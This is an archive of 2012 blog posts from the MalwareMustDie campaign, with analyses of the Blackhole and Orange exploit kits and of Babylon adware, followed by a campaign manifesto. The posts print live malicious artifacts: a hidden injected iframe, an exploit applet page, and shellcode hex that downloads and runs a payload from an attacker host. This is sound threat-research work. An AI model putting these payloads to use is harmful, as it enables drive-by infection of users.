Friday, August 31, 2012

Payloads URI die hard - Blackhole Exploit Kit

(Contents is regularly updated for sharing the closest possible to the fact)
Some MDL already informed and publish these URLs, so I have no reason to hold anymore:
payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ classical one↑
(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html ^^^^^^^^^^^^^^^^^^^^ ↑Good trick, don't be fooled with index.html (Information: this is actually iframer lead to BHEK at the below link) hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ↑Not usual one, look at the parameter at php file
(3) hXXp://crane.co.th/YabymY6p/index.html ^^^^^^^^^^^^^^^^^^^^ ↑see the above randomized subdir?
Conclusion: You can set almost every infection scheme in blackhole interface. yet the characteristic is still there. Note; This page is here because of the team work of malware researchers. Thank you for those who contributes the contents, to those who corrected and advice, for those who to read and share, and God & prayers bless them who take direct action straight to these threat.

BTW, No, I am telling you #MalwareMustDie is not selling crap.

(Updated) Beware of the BABYLON, Adware that spreads like Exploit Kit

A lot of you know about Babylon Adwares, don't you?
We ignored these guys so long. We thought they will raise no threat. Now they are spreading "with" the good evil-distribution scheme (If I cannot say it infection)
Realizing the investigated network they have, Babylon now is an AdWare yet spreads like a Exploit Pack. We should raise market awareness of this trend, who knows one day malwares came and ride under babylon scheme to become a new epidemic vector..
Please read the PoC below:
We snip a research and found the url like below:
>> --12:23:06-- >> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1 >> => `get_cfg.php@step_id=1' >> Resolving www.destorage.info... 46.165.199.26 >> Connecting to www.destorage.info|46.165.199.26|:80... connected. >> HTTP request sent, awaiting response... 200 OK >> Length: 6,614 (6.5K) [text/html] >> 100%[====================================>] 6,614 --.--K/s >> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]
Got curious so I see the inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1" >> ■[ I n s t a l l e r ] >> P u b l i s h e r N a m e = " P r e m i u m " >> P r o d u c t N a m e = " S e t u p " >> P r o d u c t V e r s i o n = " 1 . 0 " >> P r o d u c t C o d e = " { 1 7 E B 6 D D C - 1 5 2 2 - 7 2 F 9 - D 5 A E >> - 7 B >> 1 F C 1 C 4 8 7 C E } " >> P u b l i s h e r I D = " 0 " >> S o u r c e I D = " 0 " >> P a g e I D = " 0 " >> A f f i l i a t e I D = " % I n s t a l l e r _ A f f i l i a t e I D % " >> I n s t a l l e r I D = " 0 " >> V i s i t o r I D = " 0 " >> L o c a l e = " e n " >> D a t e = " 2 0 1 2 / 0 8 / 3 1 " >> T i m e = " 3 : 2 3 : 0 6 " >> S h o w I n T a s k b a r = " 1 " >> H i d e S c r e e n s = " 0 " >> I n s t a l l e r M o d e = " " >> >> [ S e r v e r ] >> I D = " 0 " >> L o c a t i o n = " D E " >> >> [ U s e r I n f o ] >> G e o L o c a t i o n = " J P " >> I P A d d r e s s = " 1 2 1 . 3 . 1 7 3 . 1 9 1 " >> W e b B r o w s e r = " 0 " >> >> [ R n d G e n ] >> P e r c e n t a g e = " 2 1 " >> >> >> [ S c r e e n 7 5 ] >> T i t l e = " S e t u p " >> B u t t o n 1 = " Y e s " >> B u t t o n 2 = " & N o " >> L a b e l 1 = " A r e y o u s u r e ? " >> : >> : >> etc
FYI, this server is serving babylon adware and is spreading either with its "kinda" exploit pack, or using Exploit Pack method. So below is conclusion:
1. The infector url is using exploit pack format. 2. Definitely logging the PC information during installation via browser and took snapshot of it in the server 3. Backdooring the installer w/o user's permission
Analysis:

Good researcher friends who I promised confidentiality was advising the site also comprised with a "suspected" malwares (I didn't analyze it yet) as follows:

> 46.165.199.26/v9/ > 46.165.199.26/v10/ VirusTotal Check is HERE-->>>[CLICK] > 46.165.199.26/v14/ > 46.165.199.26/v52/ > 46.165.199.26/v209/
Additional/updated Note: ↑I am following the reported downloaded program described in above (VT Report). This file is explaining to us why the PC information got uploaded to server. File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9 It is a binary installer using Tarma InstallMate 7 which like usual installer it drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico C:\Document..\Local Settings\Temp\Tsu5F686192.dll (I don't go to details on it yet.....)
↑It is "assumed" those will start install nasty adwares in your PC and so on.. (I am sorry for not going into detail on it either) My point is, this installer sends your PC data to motherships as per below;
DNS QUERRIES: www.reportde.info IN A + www.destorage.info IN A + www.reportnl.info IN A + www.nlstorage.info IN A + HTTP POSTS: www.reportde.info POST www.reportnl.info POST values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1" HTTP REQUESTS: www.destorage.info GET (3 times) www.nlstorage.info GET (3 times) values = /installmate/php/get_cfg.php? step_id=1& installer_id=5040612c774655.01371722& publisher_id=10& source_id=0& page_id=0& affiliate_id=0 &geo_location=JP& locale=EN& browser_id=4 HTTP/1.1
In the HTTP/POST part it sends the installer version info's, maybe is OK, but.. In the HTTP/GET part it sends your GeoIP Location, PC local Lang, Browser information, and of course your IP addresses. It is a PoC proven why records in the server exists. OK, research continues to the detected IP addresses of Babylon spreader services, It was detected the multiple directories to be used to download links distribution:
> Fast check showed : > /v9/ > /v17/ > /v14/ > /v16/ > /v20/ > /v21/ > /v10/ > /v26/ > /v37/ > /v33/ > /v27/ > /v34/ > /v31/ > /v43/ > /v46/ > /v47/ > /v48/ > /v45/ > /v51/ > /v42/ > /v58/ > /v56/ > /v52/ > /v54/ > /v53/ > /v57/ > /v62/ > /v68/ > /v64/ > /v66/ > /v69/ > /v70/ > /v72/ > /v67/ > /v75/ > /v71/ > /v73/ > /v78/ > /v76/ > /v74/ > /v77/ > /v79/ > /v82/ > /v80/ > /v81/ > /v87/ > /v86/ > /v88/ > /v84/ > /v83/ > /v98/ > /v94/ > /v96/ > /v95/ > /v99/ > /v97/ > > I guess you can try 1xx, 2xx, 3xx
Other researcher detected the mirroring scheme on 46.165.199.26 to same segment IP ADDR:
46.165.199.26/v14/ 301720 46.165.199.3/v14/ 301720 46.165.199.25/v14/ 301720
Which some similarities of downloaded files are detected:
> http://95.211.152.157/v17/ 299048 > filename="BCool.exe" > http://95.211.150.1/v17/ 299048 > filename="BCool.exe" > http://95.211.152.156/v17/ 299048 > filename="BCool.exe"
As you can see, adware is the thing that we cannot just be ignored. This adware's distributor starts to play nasty way & to victimize innocent people.
Be free to put your comment to add he current information.

Thursday, August 30, 2012

Undetected Orange Exploit Kit Infector

If you see the infected page with this code:

Don't be surprised for being undetected:

This is the orange exploit pack infector HTML analyzed in ---->>> [ H E R E ]

What Orange Exploit Kit Dropped

It is an infected HTML with the orange exploit pack.
I am following the @kafeine report of it.
Source: hxxp://breitlingline.biz/

With the infector HTML/IFrame

<iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0></iframe>

The VT detection is very low = 1/41

Java exploit of CVE-2008-5353 and CVE-2012-0507 was detected at the iframe redirected url. Giving you malicious applet like:

<html><head></head>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>

With taking you to the execution of the below shellcodes:

4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30 90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff

4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f 65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff

And your PC will be downloaded by:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

first & second download is going to be the same payload malware:

0318c42a3f.exe 059b029e9f645bafde2d603b73221f19

Which Will drop:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

Those binaries makes these rigistry key:

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

with new value:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
term= AppData
To-=C:\Documents and Settings\Administrator\Application Data <-- malware executable homebasedir

Fake Flash Updater presented by #blackhole

It is an epidemic of blackhole infection url in the wild.
Below are the analysis of the dropped malwares so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2 e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206 b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below

2. Shellcode API of kernel.dll and urmon.dll was used to download, save, execute and daemonize the payload trojan
, like:

3. Payload is packed by newest method to aboid packerDB detection
4. infected urls can be grepped by: ".php?f=" ".php?h=" by almost all MDL
5. This is the popular malware downloader used by current epidemic:

New Blackhole HTML Infector found

I came up with this sample today from MDL, I analyzed it and wrote report in VT with the below URL: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is a new infection injected code, kinda long, but malzilla and jsunpack break them after 3loop in tries. It was uploaded by 2012 Aug30th 11:30 in the infected server. Very new. No wonder VT has the Detection Ratio of (2/42)

It redirected you to the infected payload using the Java exploit

The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, still up/alive.

Or contact me for more details.

#MalwareMustDie!

Interesting Idea: (Pastebin) How to stop Blackhole Exploit Kit by using its vulnerability

Just found this anonymous article posted in the pastebin which explained "How to stop Blackhole Exploit Kit by using its vulnerability".

So many blackhole server came up in to serve malwares at the same time. The article is explaining the weaknesses of the security configuration of ngnix used by these blackholes by possibility exploiting its redirection features of it to perform a loop to gain DoS to its service.

Wednesday, August 29, 2012

#MalwareMustDie - Day1 Opening Day Report

We have a very postive response from researchers after releasing the twitter forum of #MalwareMustDie, Thank's to the reversers and analysists friends who spontaneously join & actively involve and those also who monitored the stream. it was the busiest 6hours of my life.

From appearance you may see stuffs like this:
Like you can see in the widget at the right panel of this blog..

In actual the admin panel went so crazy like this snips:
which is rolling fast for mentions & follows. Boy, we're into something!

It is a good start indeed let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great and let's stay in touch. Because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today cracking & yelling crazy in chaos.

That's the spirit boys! And we really think #MalwareMUSTdie!!

Tuesday, August 28, 2012

The raise of "#MalwareMustDie!"

Malware and its evolution is becoming the continuous threat in internet and computer industry. We are now coming to the stage to admit to the fact that malware "industry" is actually winning to persist its existence in this longest 15+ years historical fight by keep on infecting, compromising and lurking us further implementation of their evil scheme, until now.

Malware and its badness is seriously affecting our road in improving IT technology. Day by day good people in security "industry" are analyzing new malware, mitigating the the further infection by strengthen and blocking victim's prevention defensive layer of products, yet, malware, which is driven by the greediness of the actors supported by the fact of low risk of law and order consequences, is managed to grow exponentially and becoming unstoppable, by keeping on evolving its technology to one single purpose: to aim more victims.

Malware is now growing in large amount of variants and in a fast speed infection pace, as one of the scheme to evade filtration/detection/mitigation scheme of the defensive layers. Yes, malware bad actors are pushing their badness within the lag time between the new mitigation signature release to gain as many infection as possible.

There are questions that really to be answered now: "why" and "since when" we started to think and accept that malware is a "Never Ending" effort? As endless dilemma? Why this crime is unstoppable and growing wild?

Malware is now becoming a modern form of "online" crime tool of the several groups of bad actors, with their aggressive, tireless and persistent efforts that are systematic and organized, from the organization of the cyber criminal who sell the credential of the victims to the internet black market, some bunch crooks who aim to steal data and remotely logging the victim's computers, hacktivists who eager to infect the internet of things into a huge powerful traffic flooding cannons, entities who use them to spy on individuals, into the groups of extortionists with support scheme who aim for ransom upon successfully locking victim's system.

Malware is now abusing and exploiting us, not only harassing the internet obsolete scheme for the distribution, but malware is also ruining our moral values too (e.g.some of malware "methodology" are starting to be used "legally" against privacy rights, and people are okay to be advised to pay ransomware instead to stop supporting the bad actors who made it by paying ransoms, etc).

The other fact that we have to admit which is, currently our law and order infrastructure is still lacking of potential to stop the cyber crime threat for real and for good, in fact, a malware actors or blackhat hacker can always cover their trace to avoid evidence collecting. Potential by the mean of: budget, man power and knowledge. So right now, for stopping one targeted malware threat scheme law enforcement agencies have to do the global coordination and cooperation with several security entities, which is obviously costly and hard. Cyber crime is now highly profitable and far less risky than the real time crime act. This, made the rates of cyber criminal is having the lowest rank to face consequences of the badness they are doing,
In September 2014, the Europol released a report [link] that warned traditional gangs are increasingly turning to cybercrime for the above reasons.

The thing about our beloved current internet scheme is, a person, either he is a good guy or a bad guy, can use internet connection "in-the-fly" and connecting to any machine in any place and to any people he wants and performing some "activities", but when you have to handle a case of badness activity of an abuse or incident, specifically related to case the malware infection and its actors, you will be bumped to walls of boundaries, started from the service terms, domain names, territorial/regional regulation/law and in the end..politics. This is making a big issue now, so, one crook can start a badness easy and buying a bulk of domains for that purpose.. but the others can not stop that badness as easy and fast to avoid the victimization of that badness. Further, if this process is eventually combined with the law enforcing steps, the actors will be be a long gone. Unfortunately, this is the current fact now, let's face it.

Malware coders and cyber crime actors are also learning much about security exploitation technology more than us. This has been proven by their effort in keeping up following every vulnerability information, from internet server and client vectors. They also camouflage their real identity as malware coder or actors and joining some security communities in order to get the latest exploitation information to be used for their bad purpose. Their method in infection is improving too with R & D exchange between criminals in their "dark side" forums, the bad guys is teaching each others by e-book and tutorials, and so they are getting better and better, and currently few of them are actually learning so they can develop a new zeroday exploit for the purpose to make a big hit of infection. This, is also a current fact.

For the bad actors, this is all about money. Nothing personal, started from a simple economy oriented effect. For the honest living they can not get as much as they gain by using malware. They don't want to get arrested for malware they use, so they are supporting more people and more malware to join the jungle of infection scheme, they urge fellow hackers to use more bad traffic service, more loads to sell and more exploit kits promotion, with a promise of easy good money. It's no wonder if some actors, who are surviving for so long, now they are becoming clever and rich enough and having big influence in their bad-world community.

On the other hand, let's see our good people side, our malware fighting effort, now, is actually scattered in secrecy of groups, organizations or entities.People yell OPSEC here and there. Threat information is becoming a commodity in security industry. Victim's are becoming weak on their common sense in security for there are much tools to be bought and used and all they can do now is to TRUST on security products. Not to mention there are some "lame" products who are taking profit from innocent users by providing their "lame" protection too, who gain profit from the current unhappy situation. This situation is nobody's fault..it is just the fact, the way it is now that we need to improve, but frankly, it is not yet a winning stand against the rapid malware growth, instead the security industry seems to need the badness to keep on existing for them to make a living by products they sell to the victims.

What we actually need now is a better scheme to match the speed of a malware threat speed. To make the good and bad "fight" becoming a fair field to put things in good control. Internet is more and more becoming our real aspect in life and not a zoo, and was never meant to be built to be a zoo too. Realizing the situation, what we can do to make an improvement of this situation is, to start giving our hands and dedication in threat research, to spend some few hours in our time to learn, or to help others, to do anything we can do to help situation to improve. Anything that can improve the situation is worth to help. Raising the threat awareness, reporting a malicious threat that has not been seen until now, or furthermore, maybe some intelligence, these will help the expected improvement. Sadly, there is still not so many people doing these acts too.

Now. these malware come everyday in your email, in your hacked sites, in your compromised internet services, in your internet of things, they are targeting us directly, If not all people connected to internet would put a stand against malware, then there is nobody would, and there is no way we can put a winning stand against this threat forever, for sure.

Malware is aiming all of us, is exploiting our weaknesses to stab us. It is one of the source for our losing business, money and time, Please understand that TODAY, malware is NOT the only security industry's matter or security researchers problem anymore. But it is our problem, and it is up to us to control and reduce it as minimum as possible.

In order to help fixing the situation, we, a bunch of engineers and security researchers in twitter are starting "MalwareMustDie" volunteer campaign to raise people's awareness of malware threat issues. For they who want to get involve in effort to reduce malware damages, this is just a one available option for you. Do not feel no more fear, you can gather to be straightforward in opposing malware together! Malware threat cannot be conquered by the small amount of individuals, that's why your effort always helps. Let us gather strength & help each other to learn to fight it.

Malware and its crime scheme was a "taboo" topic in the internet, so a lot of common internet users mostly don't really know what is really going on out there. So we are starting to do what we can in raising its threat awareness to educate their security common sense, by technical disclosure on malware as details as possible and as easy as they can be revealed. We investigate the source of infections, its malicious scheme for you and providing crime evidence information to the authority. We are jumping to the front line to face the cyber crime directly, right in their home ground, in order to disclose malware's distribution bad actors for you to know. It is all for you to help in inspiring authority and law to act directly against it.

We need your help, if you think what we are doing is right, please support this movement. Reading and learning information about malware to educate yourself is a good start,then learn it further yourself so you may know how you can prevent their infection and can teach others to protect them self better is a step to move forward.
Or, perhaps you can do more by helping to turn off their infection machines faster from internet. Let us do whatever we can to improve our situation against the badness online.

Let's return the purity of internet. We all need you. Internet needs you.

Salve, Regina, mater misericordiae, vita, dulcedo et spes nostra, salve.
Ad te clamamus, exules filii Hevae.
Ad te suspiramus gementes et flentes in hac lacrimarum valle.
Eia ergo, advocata nostra, illos tuos misericordes oculos ad nos converte.
Et Jesum, benedictum fructum ventris tui, nobis post hoc exsilium ostende.
O clemens, o pia, o dulcis Virgo Maria.
Ora pro nobis, sancta Dei Genitrix.
Ut digni efficiamur promissionibus Christi.

MalwareMustDie, Non-Profit Organization (NPO)
malwaremustdie.org (c)MalwareMustDie, 2012-2016